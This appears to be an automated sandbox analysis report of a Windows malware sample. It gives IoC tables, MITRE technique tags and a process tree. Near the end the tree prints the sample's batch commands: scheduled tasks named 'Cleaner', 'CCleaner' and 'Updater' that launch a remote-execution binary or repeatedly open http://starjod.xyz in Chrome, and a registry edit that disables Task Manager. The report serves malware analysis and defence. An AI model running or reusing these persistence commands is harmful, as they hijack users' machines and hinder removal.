e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\O:	procexp64.exe
File opened (read-only)	\??\Q:	procexp64.exe
File opened (read-only)	\??\S:	procexp64.exe
File opened (read-only)	\??\T:	procexp64.exe
File opened (read-only)	\??\A:	procexp64.exe
File opened (read-only)	\??\B:	procexp64.exe
File opened (read-only)	\??\I:	procexp64.exe
File opened (read-only)	\??\M:	procexp64.exe
File opened (read-only)	\??\X:	procexp64.exe
File opened (read-only)	\??\F:	procexp64.exe
File opened (read-only)	\??\G:	procexp64.exe
File opened (read-only)	\??\H:	procexp64.exe
File opened (read-only)	\??\L:	procexp64.exe
File opened (read-only)	\??\W:	procexp64.exe
File opened (read-only)	\??\V:	procexp64.exe
File opened (read-only)	\??\Z:	procexp64.exe
File opened (read-only)	\??\J:	procexp64.exe
File opened (read-only)	\??\P:	procexp64.exe
File opened (read-only)	\??\R:	procexp64.exe
File opened (read-only)	\??\U:	procexp64.exe
File opened (read-only)	\??\E:	procexp64.exe
File opened (read-only)	\??\K:	procexp64.exe
File opened (read-only)	\??\N:	procexp64.exe
File opened (read-only)	\??\Y:	procexp64.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2532	procexp64.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	procexp64.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	procexp64.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	procexp64.exe
Key opened	\Registry\Machine\Hardware\Description\System\CentralProcessor	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	procexp64.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645216388694185"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3752	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
792	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2580	schtasks.exe
900	schtasks.exe
4560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2232	chrome.exe
2232	chrome.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3912	mmc.exe
2532	procexp64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2532	procexp64.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2532	procexp64.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
1604	msedge.exe
1604	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe
Token: 33	3912	mmc.exe
Token: SeIncBasePriorityPrivilege	3912	mmc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2232	chrome.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2232	chrome.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe
2532	procexp64.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3912	mmc.exe
3912	mmc.exe
2532	procexp64.exe
2532	procexp64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 4560	2652	cmd.exe	82
PID 2652 wrote to memory of 4560	2652	cmd.exe	82
PID 2652 wrote to memory of 3752	2652	cmd.exe	83
PID 2652 wrote to memory of 3752	2652	cmd.exe	83
PID 2652 wrote to memory of 2580	2652	cmd.exe	84
PID 2652 wrote to memory of 2580	2652	cmd.exe	84
PID 2652 wrote to memory of 900	2652	cmd.exe	85
PID 2652 wrote to memory of 900	2652	cmd.exe	85
PID 2232 wrote to memory of 2724	2232	chrome.exe	109
PID 2232 wrote to memory of 2724	2232	chrome.exe	109
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 4840	2232	chrome.exe	110
PID 2232 wrote to memory of 3924	2232	chrome.exe	111
PID 2232 wrote to memory of 3924	2232	chrome.exe	111
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112
PID 2232 wrote to memory of 1512	2232	chrome.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\install.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4560
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
  2⤵
  - Modifies registry key
  PID:3752
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2580
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:900

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1620

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\install.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:792

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:4268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffc991ab58,0x7fffc991ab68,0x7fffc991ab78
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:2
  2⤵
  PID:4840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:3924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2812 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2820 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4344 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:1204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4608 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4892 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:3168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4460 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:3208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:1792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5012 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5544 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
